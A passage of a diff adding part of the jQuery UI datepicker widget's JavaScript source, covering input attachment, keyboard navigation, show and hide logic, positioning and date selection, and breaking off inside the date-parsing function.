+			selectedDay: 0, selectedMonth: 0, selectedYear: 0, // current selection
+			drawMonth: 0, drawYear: 0, // month being drawn
+			inline: inline, // is datepicker inline or not
+			dpDiv: (!inline ? this.dpDiv : // presentation div
+			datepicker_bindHover($("<div class='" + this._inlineClass + " ui-datepicker ui-widget ui-widget-content ui-helper-clearfix ui-corner-all'></div>")))};
+	},
+
+	/* Attach the date picker to an input field. */
+	_connectDatepicker: function(target, inst) {
+		var input = $(target);
+		inst.append = $([]);
+		inst.trigger = $([]);
+		if (input.hasClass(this.markerClassName)) {
+			return;
+		}
+		this._attachments(input, inst);
+		input.addClass(this.markerClassName).keydown(this._doKeyDown).
+			keypress(this._doKeyPress).keyup(this._doKeyUp);
+		this._autoSize(inst);
+		$.data(target, "datepicker", inst);
+		//If disabled option is true, disable the datepicker once it has been attached to the input (see ticket #5665)
+		if( inst.settings.disabled ) {
+			this._disableDatepicker( target );
+		}
+	},
+
+	/* Make attachments based on settings. */
+	_attachments: function(input, inst) {
+		var showOn, buttonText, buttonImage,
+			appendText = this._get(inst, "appendText"),
+			isRTL = this._get(inst, "isRTL");
+
+		if (inst.append) {
+			inst.append.remove();
+		}
+		if (appendText) {
+			inst.append = $("<span class='" + this._appendClass + "'>" + appendText + "</span>");
+			input[isRTL ? "before" : "after"](inst.append);
+		}
+
+		input.unbind("focus", this._showDatepicker);
+
+		if (inst.trigger) {
+			inst.trigger.remove();
+		}
+
+		showOn = this._get(inst, "showOn");
+		if (showOn === "focus" || showOn === "both") { // pop-up date picker when in the marked field
+			input.focus(this._showDatepicker);
+		}
+		if (showOn === "button" || showOn === "both") { // pop-up date picker when button clicked
+			buttonText = this._get(inst, "buttonText");
+			buttonImage = this._get(inst, "buttonImage");
+			inst.trigger = $(this._get(inst, "buttonImageOnly") ?
+				$("<img/>").addClass(this._triggerClass).
+					attr({ src: buttonImage, alt: buttonText, title: buttonText }) :
+				$("<button type='button'></button>").addClass(this._triggerClass).
+					html(!buttonImage ? buttonText : $("<img/>").attr(
+					{ src:buttonImage, alt:buttonText, title:buttonText })));
+			input[isRTL ? "before" : "after"](inst.trigger);
+			inst.trigger.click(function() {
+				if ($.datepicker._datepickerShowing && $.datepicker._lastInput === input[0]) {
+					$.datepicker._hideDatepicker();
+				} else if ($.datepicker._datepickerShowing && $.datepicker._lastInput !== input[0]) {
+					$.datepicker._hideDatepicker();
+					$.datepicker._showDatepicker(input[0]);
+				} else {
+					$.datepicker._showDatepicker(input[0]);
+				}
+				return false;
+			});
+		}
+	},
+
+	/* Apply the maximum length for the date format. */
+	_autoSize: function(inst) {
+		if (this._get(inst, "autoSize") && !inst.inline) {
+			var findMax, max, maxI, i,
+				date = new Date(2009, 12 - 1, 20), // Ensure double digits
+				dateFormat = this._get(inst, "dateFormat");
+
+			if (dateFormat.match(/[DM]/)) {
+				findMax = function(names) {
+					max = 0;
+					maxI = 0;
+					for (i = 0; i < names.length; i++) {
+						if (names[i].length > max) {
+							max = names[i].length;
+							maxI = i;
+						}
+					}
+					return maxI;
+				};
+				date.setMonth(findMax(this._get(inst, (dateFormat.match(/MM/) ?
+					"monthNames" : "monthNamesShort"))));
+				date.setDate(findMax(this._get(inst, (dateFormat.match(/DD/) ?
+					"dayNames" : "dayNamesShort"))) + 20 - date.getDay());
+			}
+			inst.input.attr("size", this._formatDate(inst, date).length);
+		}
+	},
+
+	/* Attach an inline date picker to a div. */
+	_inlineDatepicker: function(target, inst) {
+		var divSpan = $(target);
+		if (divSpan.hasClass(this.markerClassName)) {
+			return;
+		}
+		divSpan.addClass(this.markerClassName).append(inst.dpDiv);
+		$.data(target, "datepicker", inst);
+		this._setDate(inst, this._getDefaultDate(inst), true);
+		this._updateDatepicker(inst);
+		this._updateAlternate(inst);
+		//If disabled option is true, disable the datepicker before showing it (see ticket #5665)
+		if( inst.settings.disabled ) {
+			this._disableDatepicker( target );
+		}
+		// Set display:block in place of inst.dpDiv.show() which won't work on disconnected elements
+		// http://bugs.jqueryui.com/ticket/7552 - A Datepicker created on a detached div has zero height
+		inst.dpDiv.css( "display", "block" );
+	},
+
+	/* Pop-up the date picker in a "dialog" box.
+	 * @param  input element - ignored
+	 * @param  date	string or Date - the initial date to display
+	 * @param  onSelect  function - the function to call when a date is selected
+	 * @param  settings  object - update the dialog date picker instance's settings (anonymous object)
+	 * @param  pos int[2] - coordinates for the dialog's position within the screen or
+	 *					event - with x/y coordinates or
+	 *					leave empty for default (screen centre)
+	 * @return the manager object
+	 */
+	_dialogDatepicker: function(input, date, onSelect, settings, pos) {
+		var id, browserWidth, browserHeight, scrollX, scrollY,
+			inst = this._dialogInst; // internal instance
+
+		if (!inst) {
+			this.uuid += 1;
+			id = "dp" + this.uuid;
+			this._dialogInput = $("<input type='text' id='" + id +
+				"' style='position: absolute; top: -100px; width: 0px;'/>");
+			this._dialogInput.keydown(this._doKeyDown);
+			$("body").append(this._dialogInput);
+			inst = this._dialogInst = this._newInst(this._dialogInput, false);
+			inst.settings = {};
+			$.data(this._dialogInput[0], "datepicker", inst);
+		}
+		datepicker_extendRemove(inst.settings, settings || {});
+		date = (date && date.constructor === Date ? this._formatDate(inst, date) : date);
+		this._dialogInput.val(date);
+
+		this._pos = (pos ? (pos.length ? pos : [pos.pageX, pos.pageY]) : null);
+		if (!this._pos) {
+			browserWidth = document.documentElement.clientWidth;
+			browserHeight = document.documentElement.clientHeight;
+			scrollX = document.documentElement.scrollLeft || document.body.scrollLeft;
+			scrollY = document.documentElement.scrollTop || document.body.scrollTop;
+			this._pos = // should use actual width/height below
+				[(browserWidth / 2) - 100 + scrollX, (browserHeight / 2) - 150 + scrollY];
+		}
+
+		// move input on screen for focus, but hidden behind dialog
+		this._dialogInput.css("left", (this._pos[0] + 20) + "px").css("top", this._pos[1] + "px");
+		inst.settings.onSelect = onSelect;
+		this._inDialog = true;
+		this.dpDiv.addClass(this._dialogClass);
+		this._showDatepicker(this._dialogInput[0]);
+		if ($.blockUI) {
+			$.blockUI(this.dpDiv);
+		}
+		$.data(this._dialogInput[0], "datepicker", inst);
+		return this;
+	},
+
+	/* Detach a datepicker from its control.
+	 * @param  target	element - the target input field or division or span
+	 */
+	_destroyDatepicker: function(target) {
+		var nodeName,
+			$target = $(target),
+			inst = $.data(target, "datepicker");
+
+		if (!$target.hasClass(this.markerClassName)) {
+			return;
+		}
+
+		nodeName = target.nodeName.toLowerCase();
+		$.removeData(target, "datepicker");
+		if (nodeName === "input") {
+			inst.append.remove();
+			inst.trigger.remove();
+			$target.removeClass(this.markerClassName).
+				unbind("focus", this._showDatepicker).
+				unbind("keydown", this._doKeyDown).
+				unbind("keypress", this._doKeyPress).
+				unbind("keyup", this._doKeyUp);
+		} else if (nodeName === "div" || nodeName === "span") {
+			$target.removeClass(this.markerClassName).empty();
+		}
+
+		if ( datepicker_instActive === inst ) {
+			datepicker_instActive = null;
+		}
+	},
+
+	/* Enable the date picker to a jQuery selection.
+	 * @param  target	element - the target input field or division or span
+	 */
+	_enableDatepicker: function(target) {
+		var nodeName, inline,
+			$target = $(target),
+			inst = $.data(target, "datepicker");
+
+		if (!$target.hasClass(this.markerClassName)) {
+			return;
+		}
+
+		nodeName = target.nodeName.toLowerCase();
+		if (nodeName === "input") {
+			target.disabled = false;
+			inst.trigger.filter("button").
+				each(function() { this.disabled = false; }).end().
+				filter("img").css({opacity: "1.0", cursor: ""});
+		} else if (nodeName === "div" || nodeName === "span") {
+			inline = $target.children("." + this._inlineClass);
+			inline.children().removeClass("ui-state-disabled");
+			inline.find("select.ui-datepicker-month, select.ui-datepicker-year").
+				prop("disabled", false);
+		}
+		this._disabledInputs = $.map(this._disabledInputs,
+			function(value) { return (value === target ? null : value); }); // delete entry
+	},
+
+	/* Disable the date picker to a jQuery selection.
+	 * @param  target	element - the target input field or division or span
+	 */
+	_disableDatepicker: function(target) {
+		var nodeName, inline,
+			$target = $(target),
+			inst = $.data(target, "datepicker");
+
+		if (!$target.hasClass(this.markerClassName)) {
+			return;
+		}
+
+		nodeName = target.nodeName.toLowerCase();
+		if (nodeName === "input") {
+			target.disabled = true;
+			inst.trigger.filter("button").
+				each(function() { this.disabled = true; }).end().
+				filter("img").css({opacity: "0.5", cursor: "default"});
+		} else if (nodeName === "div" || nodeName === "span") {
+			inline = $target.children("." + this._inlineClass);
+			inline.children().addClass("ui-state-disabled");
+			inline.find("select.ui-datepicker-month, select.ui-datepicker-year").
+				prop("disabled", true);
+		}
+		this._disabledInputs = $.map(this._disabledInputs,
+			function(value) { return (value === target ? null : value); }); // delete entry
+		this._disabledInputs[this._disabledInputs.length] = target;
+	},
+
+	/* Is the first field in a jQuery collection disabled as a datepicker?
+	 * @param  target	element - the target input field or division or span
+	 * @return boolean - true if disabled, false if enabled
+	 */
+	_isDisabledDatepicker: function(target) {
+		if (!target) {
+			return false;
+		}
+		for (var i = 0; i < this._disabledInputs.length; i++) {
+			if (this._disabledInputs[i] === target) {
+				return true;
+			}
+		}
+		return false;
+	},
+
+	/* Retrieve the instance data for the target control.
+	 * @param  target  element - the target input field or division or span
+	 * @return  object - the associated instance data
+	 * @throws  error if a jQuery problem getting data
+	 */
+	_getInst: function(target) {
+		try {
+			return $.data(target, "datepicker");
+		}
+		catch (err) {
+			throw "Missing instance data for this datepicker";
+		}
+	},
+
+	/* Update or retrieve the settings for a date picker attached to an input field or division.
+	 * @param  target  element - the target input field or division or span
+	 * @param  name	object - the new settings to update or
+	 *				string - the name of the setting to change or retrieve,
+	 *				when retrieving also "all" for all instance settings or
+	 *				"defaults" for all global defaults
+	 * @param  value   any - the new value for the setting
+	 *				(omit if above is an object or to retrieve a value)
+	 */
+	_optionDatepicker: function(target, name, value) {
+		var settings, date, minDate, maxDate,
+			inst = this._getInst(target);
+
+		if (arguments.length === 2 && typeof name === "string") {
+			return (name === "defaults" ? $.extend({}, $.datepicker._defaults) :
+				(inst ? (name === "all" ? $.extend({}, inst.settings) :
+				this._get(inst, name)) : null));
+		}
+
+		settings = name || {};
+		if (typeof name === "string") {
+			settings = {};
+			settings[name] = value;
+		}
+
+		if (inst) {
+			if (this._curInst === inst) {
+				this._hideDatepicker();
+			}
+
+			date = this._getDateDatepicker(target, true);
+			minDate = this._getMinMaxDate(inst, "min");
+			maxDate = this._getMinMaxDate(inst, "max");
+			datepicker_extendRemove(inst.settings, settings);
+			// reformat the old minDate/maxDate values if dateFormat changes and a new minDate/maxDate isn't provided
+			if (minDate !== null && settings.dateFormat !== undefined && settings.minDate === undefined) {
+				inst.settings.minDate = this._formatDate(inst, minDate);
+			}
+			if (maxDate !== null && settings.dateFormat !== undefined && settings.maxDate === undefined) {
+				inst.settings.maxDate = this._formatDate(inst, maxDate);
+			}
+			if ( "disabled" in settings ) {
+				if ( settings.disabled ) {
+					this._disableDatepicker(target);
+				} else {
+					this._enableDatepicker(target);
+				}
+			}
+			this._attachments($(target), inst);
+			this._autoSize(inst);
+			this._setDate(inst, date);
+			this._updateAlternate(inst);
+			this._updateDatepicker(inst);
+		}
+	},
+
+	// change method deprecated
+	_changeDatepicker: function(target, name, value) {
+		this._optionDatepicker(target, name, value);
+	},
+
+	/* Redraw the date picker attached to an input field or division.
+	 * @param  target  element - the target input field or division or span
+	 */
+	_refreshDatepicker: function(target) {
+		var inst = this._getInst(target);
+		if (inst) {
+			this._updateDatepicker(inst);
+		}
+	},
+
+	/* Set the dates for a jQuery selection.
+	 * @param  target element - the target input field or division or span
+	 * @param  date	Date - the new date
+	 */
+	_setDateDatepicker: function(target, date) {
+		var inst = this._getInst(target);
+		if (inst) {
+			this._setDate(inst, date);
+			this._updateDatepicker(inst);
+			this._updateAlternate(inst);
+		}
+	},
+
+	/* Get the date(s) for the first entry in a jQuery selection.
+	 * @param  target element - the target input field or division or span
+	 * @param  noDefault boolean - true if no default date is to be used
+	 * @return Date - the current date
+	 */
+	_getDateDatepicker: function(target, noDefault) {
+		var inst = this._getInst(target);
+		if (inst && !inst.inline) {
+			this._setDateFromField(inst, noDefault);
+		}
+		return (inst ? this._getDate(inst) : null);
+	},
+
+	/* Handle keystrokes. */
+	_doKeyDown: function(event) {
+		var onSelect, dateStr, sel,
+			inst = $.datepicker._getInst(event.target),
+			handled = true,
+			isRTL = inst.dpDiv.is(".ui-datepicker-rtl");
+
+		inst._keyEvent = true;
+		if ($.datepicker._datepickerShowing) {
+			switch (event.keyCode) {
+				case 9: $.datepicker._hideDatepicker();
+						handled = false;
+						break; // hide on tab out
+				case 13: sel = $("td." + $.datepicker._dayOverClass + ":not(." +
+									$.datepicker._currentClass + ")", inst.dpDiv);
+						if (sel[0]) {
+							$.datepicker._selectDay(event.target, inst.selectedMonth, inst.selectedYear, sel[0]);
+						}
+
+						onSelect = $.datepicker._get(inst, "onSelect");
+						if (onSelect) {
+							dateStr = $.datepicker._formatDate(inst);
+
+							// trigger custom callback
+							onSelect.apply((inst.input ? inst.input[0] : null), [dateStr, inst]);
+						} else {
+							$.datepicker._hideDatepicker();
+						}
+
+						return false; // don't submit the form
+				case 27: $.datepicker._hideDatepicker();
+						break; // hide on escape
+				case 33: $.datepicker._adjustDate(event.target, (event.ctrlKey ?
+							-$.datepicker._get(inst, "stepBigMonths") :
+							-$.datepicker._get(inst, "stepMonths")), "M");
+						break; // previous month/year on page up/+ ctrl
+				case 34: $.datepicker._adjustDate(event.target, (event.ctrlKey ?
+							+$.datepicker._get(inst, "stepBigMonths") :
+							+$.datepicker._get(inst, "stepMonths")), "M");
+						break; // next month/year on page down/+ ctrl
+				case 35: if (event.ctrlKey || event.metaKey) {
+							$.datepicker._clearDate(event.target);
+						}
+						handled = event.ctrlKey || event.metaKey;
+						break; // clear on ctrl or command +end
+				case 36: if (event.ctrlKey || event.metaKey) {
+							$.datepicker._gotoToday(event.target);
+						}
+						handled = event.ctrlKey || event.metaKey;
+						break; // current on ctrl or command +home
+				case 37: if (event.ctrlKey || event.metaKey) {
+							$.datepicker._adjustDate(event.target, (isRTL ? +1 : -1), "D");
+						}
+						handled = event.ctrlKey || event.metaKey;
+						// -1 day on ctrl or command +left
+						if (event.originalEvent.altKey) {
+							$.datepicker._adjustDate(event.target, (event.ctrlKey ?
+								-$.datepicker._get(inst, "stepBigMonths") :
+								-$.datepicker._get(inst, "stepMonths")), "M");
+						}
+						// next month/year on alt +left on Mac
+						break;
+				case 38: if (event.ctrlKey || event.metaKey) {
+							$.datepicker._adjustDate(event.target, -7, "D");
+						}
+						handled = event.ctrlKey || event.metaKey;
+						break; // -1 week on ctrl or command +up
+				case 39: if (event.ctrlKey || event.metaKey) {
+							$.datepicker._adjustDate(event.target, (isRTL ? -1 : +1), "D");
+						}
+						handled = event.ctrlKey || event.metaKey;
+						// +1 day on ctrl or command +right
+						if (event.originalEvent.altKey) {
+							$.datepicker._adjustDate(event.target, (event.ctrlKey ?
+								+$.datepicker._get(inst, "stepBigMonths") :
+								+$.datepicker._get(inst, "stepMonths")), "M");
+						}
+						// next month/year on alt +right
+						break;
+				case 40: if (event.ctrlKey || event.metaKey) {
+							$.datepicker._adjustDate(event.target, +7, "D");
+						}
+						handled = event.ctrlKey || event.metaKey;
+						break; // +1 week on ctrl or command +down
+				default: handled = false;
+			}
+		} else if (event.keyCode === 36 && event.ctrlKey) { // display the date picker on ctrl+home
+			$.datepicker._showDatepicker(this);
+		} else {
+			handled = false;
+		}
+
+		if (handled) {
+			event.preventDefault();
+			event.stopPropagation();
+		}
+	},
+
+	/* Filter entered characters - based on date format. */
+	_doKeyPress: function(event) {
+		var chars, chr,
+			inst = $.datepicker._getInst(event.target);
+
+		if ($.datepicker._get(inst, "constrainInput")) {
+			chars = $.datepicker._possibleChars($.datepicker._get(inst, "dateFormat"));
+			chr = String.fromCharCode(event.charCode == null ? event.keyCode : event.charCode);
+			return event.ctrlKey || event.metaKey || (chr < " " || !chars || chars.indexOf(chr) > -1);
+		}
+	},
+
+	/* Synchronise manual entry and field/alternate field. */
+	_doKeyUp: function(event) {
+		var date,
+			inst = $.datepicker._getInst(event.target);
+
+		if (inst.input.val() !== inst.lastVal) {
+			try {
+				date = $.datepicker.parseDate($.datepicker._get(inst, "dateFormat"),
+					(inst.input ? inst.input.val() : null),
+					$.datepicker._getFormatConfig(inst));
+
+				if (date) { // only if valid
+					$.datepicker._setDateFromField(inst);
+					$.datepicker._updateAlternate(inst);
+					$.datepicker._updateDatepicker(inst);
+				}
+			}
+			catch (err) {
+			}
+		}
+		return true;
+	},
+
+	/* Pop-up the date picker for a given input field.
+	 * If false returned from beforeShow event handler do not show.
+	 * @param  input  element - the input field attached to the date picker or
+	 *					event - if triggered by focus
+	 */
+	_showDatepicker: function(input) {
+		input = input.target || input;
+		if (input.nodeName.toLowerCase() !== "input") { // find from button/image trigger
+			input = $("input", input.parentNode)[0];
+		}
+
+		if ($.datepicker._isDisabledDatepicker(input) || $.datepicker._lastInput === input) { // already here
+			return;
+		}
+
+		var inst, beforeShow, beforeShowSettings, isFixed,
+			offset, showAnim, duration;
+
+		inst = $.datepicker._getInst(input);
+		if ($.datepicker._curInst && $.datepicker._curInst !== inst) {
+			$.datepicker._curInst.dpDiv.stop(true, true);
+			if ( inst && $.datepicker._datepickerShowing ) {
+				$.datepicker._hideDatepicker( $.datepicker._curInst.input[0] );
+			}
+		}
+
+		beforeShow = $.datepicker._get(inst, "beforeShow");
+		beforeShowSettings = beforeShow ? beforeShow.apply(input, [input, inst]) : {};
+		if(beforeShowSettings === false){
+			return;
+		}
+		datepicker_extendRemove(inst.settings, beforeShowSettings);
+
+		inst.lastVal = null;
+		$.datepicker._lastInput = input;
+		$.datepicker._setDateFromField(inst);
+
+		if ($.datepicker._inDialog) { // hide cursor
+			input.value = "";
+		}
+		if (!$.datepicker._pos) { // position below input
+			$.datepicker._pos = $.datepicker._findPos(input);
+			$.datepicker._pos[1] += input.offsetHeight; // add the height
+		}
+
+		isFixed = false;
+		$(input).parents().each(function() {
+			isFixed |= $(this).css("position") === "fixed";
+			return !isFixed;
+		});
+
+		offset = {left: $.datepicker._pos[0], top: $.datepicker._pos[1]};
+		$.datepicker._pos = null;
+		//to avoid flashes on Firefox
+		inst.dpDiv.empty();
+		// determine sizing offscreen
+		inst.dpDiv.css({position: "absolute", display: "block", top: "-1000px"});
+		$.datepicker._updateDatepicker(inst);
+		// fix width for dynamic number of date pickers
+		// and adjust position before showing
+		offset = $.datepicker._checkOffset(inst, offset, isFixed);
+		inst.dpDiv.css({position: ($.datepicker._inDialog && $.blockUI ?
+			"static" : (isFixed ? "fixed" : "absolute")), display: "none",
+			left: offset.left + "px", top: offset.top + "px"});
+
+		if (!inst.inline) {
+			showAnim = $.datepicker._get(inst, "showAnim");
+			duration = $.datepicker._get(inst, "duration");
+			inst.dpDiv.css( "z-index", datepicker_getZindex( $( input ) ) + 1 );
+			$.datepicker._datepickerShowing = true;
+
+			if ( $.effects && $.effects.effect[ showAnim ] ) {
+				inst.dpDiv.show(showAnim, $.datepicker._get(inst, "showOptions"), duration);
+			} else {
+				inst.dpDiv[showAnim || "show"](showAnim ? duration : null);
+			}
+
+			if ( $.datepicker._shouldFocusInput( inst ) ) {
+				inst.input.focus();
+			}
+
+			$.datepicker._curInst = inst;
+		}
+	},
+
+	/* Generate the date picker content. */
+	_updateDatepicker: function(inst) {
+		this.maxRows = 4; //Reset the max number of rows being displayed (see #7043)
+		datepicker_instActive = inst; // for delegate hover events
+		inst.dpDiv.empty().append(this._generateHTML(inst));
+		this._attachHandlers(inst);
+
+		var origyearshtml,
+			numMonths = this._getNumberOfMonths(inst),
+			cols = numMonths[1],
+			width = 17,
+			activeCell = inst.dpDiv.find( "." + this._dayOverClass + " a" );
+
+		if ( activeCell.length > 0 ) {
+			datepicker_handleMouseover.apply( activeCell.get( 0 ) );
+		}
+
+		inst.dpDiv.removeClass("ui-datepicker-multi-2 ui-datepicker-multi-3 ui-datepicker-multi-4").width("");
+		if (cols > 1) {
+			inst.dpDiv.addClass("ui-datepicker-multi-" + cols).css("width", (width * cols) + "em");
+		}
+		inst.dpDiv[(numMonths[0] !== 1 || numMonths[1] !== 1 ? "add" : "remove") +
+			"Class"]("ui-datepicker-multi");
+		inst.dpDiv[(this._get(inst, "isRTL") ? "add" : "remove") +
+			"Class"]("ui-datepicker-rtl");
+
+		if (inst === $.datepicker._curInst && $.datepicker._datepickerShowing && $.datepicker._shouldFocusInput( inst ) ) {
+			inst.input.focus();
+		}
+
+		// deffered render of the years select (to avoid flashes on Firefox)
+		if( inst.yearshtml ){
+			origyearshtml = inst.yearshtml;
+			setTimeout(function(){
+				//assure that inst.yearshtml didn't change.
+				if( origyearshtml === inst.yearshtml && inst.yearshtml ){
+					inst.dpDiv.find("select.ui-datepicker-year:first").replaceWith(inst.yearshtml);
+				}
+				origyearshtml = inst.yearshtml = null;
+			}, 0);
+		}
+	},
+
+	// #6694 - don't focus the input if it's already focused
+	// this breaks the change event in IE
+	// Support: IE and jQuery <1.9
+	_shouldFocusInput: function( inst ) {
+		return inst.input && inst.input.is( ":visible" ) && !inst.input.is( ":disabled" ) && !inst.input.is( ":focus" );
+	},
+
+	/* Check positioning to remain on screen. */
+	_checkOffset: function(inst, offset, isFixed) {
+		var dpWidth = inst.dpDiv.outerWidth(),
+			dpHeight = inst.dpDiv.outerHeight(),
+			inputWidth = inst.input ? inst.input.outerWidth() : 0,
+			inputHeight = inst.input ? inst.input.outerHeight() : 0,
+			viewWidth = document.documentElement.clientWidth + (isFixed ? 0 : $(document).scrollLeft()),
+			viewHeight = document.documentElement.clientHeight + (isFixed ? 0 : $(document).scrollTop());
+
+		offset.left -= (this._get(inst, "isRTL") ? (dpWidth - inputWidth) : 0);
+		offset.left -= (isFixed && offset.left === inst.input.offset().left) ? $(document).scrollLeft() : 0;
+		offset.top -= (isFixed && offset.top === (inst.input.offset().top + inputHeight)) ? $(document).scrollTop() : 0;
+
+		// now check if datepicker is showing outside window viewport - move to a better place if so.
+		offset.left -= Math.min(offset.left, (offset.left + dpWidth > viewWidth && viewWidth > dpWidth) ?
+			Math.abs(offset.left + dpWidth - viewWidth) : 0);
+		offset.top -= Math.min(offset.top, (offset.top + dpHeight > viewHeight && viewHeight > dpHeight) ?
+			Math.abs(dpHeight + inputHeight) : 0);
+
+		return offset;
+	},
+
+	/* Find an object's position on the screen. */
+	_findPos: function(obj) {
+		var position,
+			inst = this._getInst(obj),
+			isRTL = this._get(inst, "isRTL");
+
+		while (obj && (obj.type === "hidden" || obj.nodeType !== 1 || $.expr.filters.hidden(obj))) {
+			obj = obj[isRTL ? "previousSibling" : "nextSibling"];
+		}
+
+		position = $(obj).offset();
+		return [position.left, position.top];
+	},
+
+	/* Hide the date picker from view.
+	 * @param  input  element - the input field attached to the date picker
+	 */
+	_hideDatepicker: function(input) {
+		var showAnim, duration, postProcess, onClose,
+			inst = this._curInst;
+
+		if (!inst || (input && inst !== $.data(input, "datepicker"))) {
+			return;
+		}
+
+		if (this._datepickerShowing) {
+			showAnim = this._get(inst, "showAnim");
+			duration = this._get(inst, "duration");
+			postProcess = function() {
+				$.datepicker._tidyDialog(inst);
+			};
+
+			// DEPRECATED: after BC for 1.8.x $.effects[ showAnim ] is not needed
+			if ( $.effects && ( $.effects.effect[ showAnim ] || $.effects[ showAnim ] ) ) {
+				inst.dpDiv.hide(showAnim, $.datepicker._get(inst, "showOptions"), duration, postProcess);
+			} else {
+				inst.dpDiv[(showAnim === "slideDown" ? "slideUp" :
+					(showAnim === "fadeIn" ? "fadeOut" : "hide"))]((showAnim ? duration : null), postProcess);
+			}
+
+			if (!showAnim) {
+				postProcess();
+			}
+			this._datepickerShowing = false;
+
+			onClose = this._get(inst, "onClose");
+			if (onClose) {
+				onClose.apply((inst.input ? inst.input[0] : null), [(inst.input ? inst.input.val() : ""), inst]);
+			}
+
+			this._lastInput = null;
+			if (this._inDialog) {
+				this._dialogInput.css({ position: "absolute", left: "0", top: "-100px" });
+				if ($.blockUI) {
+					$.unblockUI();
+					$("body").append(this.dpDiv);
+				}
+			}
+			this._inDialog = false;
+		}
+	},
+
+	/* Tidy up after a dialog display. */
+	_tidyDialog: function(inst) {
+		inst.dpDiv.removeClass(this._dialogClass).unbind(".ui-datepicker-calendar");
+	},
+
+	/* Close date picker if clicked elsewhere. */
+	_checkExternalClick: function(event) {
+		if (!$.datepicker._curInst) {
+			return;
+		}
+
+		var $target = $(event.target),
+			inst = $.datepicker._getInst($target[0]);
+
+		if ( ( ( $target[0].id !== $.datepicker._mainDivId &&
+				$target.parents("#" + $.datepicker._mainDivId).length === 0 &&
+				!$target.hasClass($.datepicker.markerClassName) &&
+				!$target.closest("." + $.datepicker._triggerClass).length &&
+				$.datepicker._datepickerShowing && !($.datepicker._inDialog && $.blockUI) ) ) ||
+			( $target.hasClass($.datepicker.markerClassName) && $.datepicker._curInst !== inst ) ) {
+				$.datepicker._hideDatepicker();
+		}
+	},
+
+	/* Adjust one of the date sub-fields. */
+	_adjustDate: function(id, offset, period) {
+		var target = $(id),
+			inst = this._getInst(target[0]);
+
+		if (this._isDisabledDatepicker(target[0])) {
+			return;
+		}
+		this._adjustInstDate(inst, offset +
+			(period === "M" ? this._get(inst, "showCurrentAtPos") : 0), // undo positioning
+			period);
+		this._updateDatepicker(inst);
+	},
+
+	/* Action for current link. */
+	_gotoToday: function(id) {
+		var date,
+			target = $(id),
+			inst = this._getInst(target[0]);
+
+		if (this._get(inst, "gotoCurrent") && inst.currentDay) {
+			inst.selectedDay = inst.currentDay;
+			inst.drawMonth = inst.selectedMonth = inst.currentMonth;
+			inst.drawYear = inst.selectedYear = inst.currentYear;
+		} else {
+			date = new Date();
+			inst.selectedDay = date.getDate();
+			inst.drawMonth = inst.selectedMonth = date.getMonth();
+			inst.drawYear = inst.selectedYear = date.getFullYear();
+		}
+		this._notifyChange(inst);
+		this._adjustDate(target);
+	},
+
+	/* Action for selecting a new month/year. */
+	_selectMonthYear: function(id, select, period) {
+		var target = $(id),
+			inst = this._getInst(target[0]);
+
+		inst["selected" + (period === "M" ? "Month" : "Year")] =
+		inst["draw" + (period === "M" ? "Month" : "Year")] =
+			parseInt(select.options[select.selectedIndex].value,10);
+
+		this._notifyChange(inst);
+		this._adjustDate(target);
+	},
+
+	/* Action for selecting a day. */
+	_selectDay: function(id, month, year, td) {
+		var inst,
+			target = $(id);
+
+		if ($(td).hasClass(this._unselectableClass) || this._isDisabledDatepicker(target[0])) {
+			return;
+		}
+
+		inst = this._getInst(target[0]);
+		inst.selectedDay = inst.currentDay = $("a", td).html();
+		inst.selectedMonth = inst.currentMonth = month;
+		inst.selectedYear = inst.currentYear = year;
+		this._selectDate(id, this._formatDate(inst,
+			inst.currentDay, inst.currentMonth, inst.currentYear));
+	},
+
+	/* Erase the input field and hide the date picker. */
+	_clearDate: function(id) {
+		var target = $(id);
+		this._selectDate(target, "");
+	},
+
+	/* Update the input field with the selected date. */
+	_selectDate: function(id, dateStr) {
+		var onSelect,
+			target = $(id),
+			inst = this._getInst(target[0]);
+
+		dateStr = (dateStr != null ? dateStr : this._formatDate(inst));
+		if (inst.input) {
+			inst.input.val(dateStr);
+		}
+		this._updateAlternate(inst);
+
+		onSelect = this._get(inst, "onSelect");
+		if (onSelect) {
+			onSelect.apply((inst.input ? inst.input[0] : null), [dateStr, inst]);  // trigger custom callback
+		} else if (inst.input) {
+			inst.input.trigger("change"); // fire the change event
+		}
+
+		if (inst.inline){
+			this._updateDatepicker(inst);
+		} else {
+			this._hideDatepicker();
+			this._lastInput = inst.input[0];
+			if (typeof(inst.input[0]) !== "object") {
+				inst.input.focus(); // restore focus
+			}
+			this._lastInput = null;
+		}
+	},
+
+	/* Update any alternate field to synchronise with the main field. */
+	_updateAlternate: function(inst) {
+		var altFormat, date, dateStr,
+			altField = this._get(inst, "altField");
+
+		if (altField) { // update alternate field too
+			altFormat = this._get(inst, "altFormat") || this._get(inst, "dateFormat");
+			date = this._getDate(inst);
+			dateStr = this.formatDate(altFormat, date, this._getFormatConfig(inst));
+			$(altField).each(function() { $(this).val(dateStr); });
+		}
+	},
+
+	/* Set as beforeShowDay function to prevent selection of weekends.
+	 * @param  date  Date - the date to customise
+	 * @return [boolean, string] - is this date selectable?, what is its CSS class?
+	 */
+	noWeekends: function(date) {
+		var day = date.getDay();
+		return [(day > 0 && day < 6), ""];
+	},
+
+	/* Set as calculateWeek to determine the week of the year based on the ISO 8601 definition.
+	 * @param  date  Date - the date to get the week for
+	 * @return  number - the number of the week within the year that contains this date
+	 */
+	iso8601Week: function(date) {
+		var time,
+			checkDate = new Date(date.getTime());
+
+		// Find Thursday of this week starting on Monday
+		checkDate.setDate(checkDate.getDate() + 4 - (checkDate.getDay() || 7));
+
+		time = checkDate.getTime();
+		checkDate.setMonth(0); // Compare with Jan 1
+		checkDate.setDate(1);
+		return Math.floor(Math.round((time - checkDate) / 86400000) / 7) + 1;
+	},
+
+	/* Parse a string value into a date object.
+	 * See formatDate below for the possible formats.
+	 *
+	 * @param  format string - the expected format of the date
+	 * @param  value string - the date in the above format
+	 * @param  settings Object - attributes include:
+	 *					shortYearCutoff  number - the cutoff year for determining the century (optional)
+	 *					dayNamesShort	string[7] - abbreviated names of the days from Sunday (optional)
+	 *					dayNames		string[7] - names of the days from Sunday (optional)
+	 *					monthNamesShort string[12] - abbreviated names of the months (optional)
+	 *					monthNames		string[12] - names of the months (optional)
+	 * @return  Date - the extracted date value or null if value is blank
+	 */
+	parseDate: function (format, value, settings) {
+		if (format == null || value == null) {
+			throw "Invalid arguments";
+		}
+
+		value = (typeof value === "object" ? value.toString() : value + "");
+		if (value === "") {
+			return null;
+		}
+
+		var iFormat, dim, extra,
+			iValue = 0,
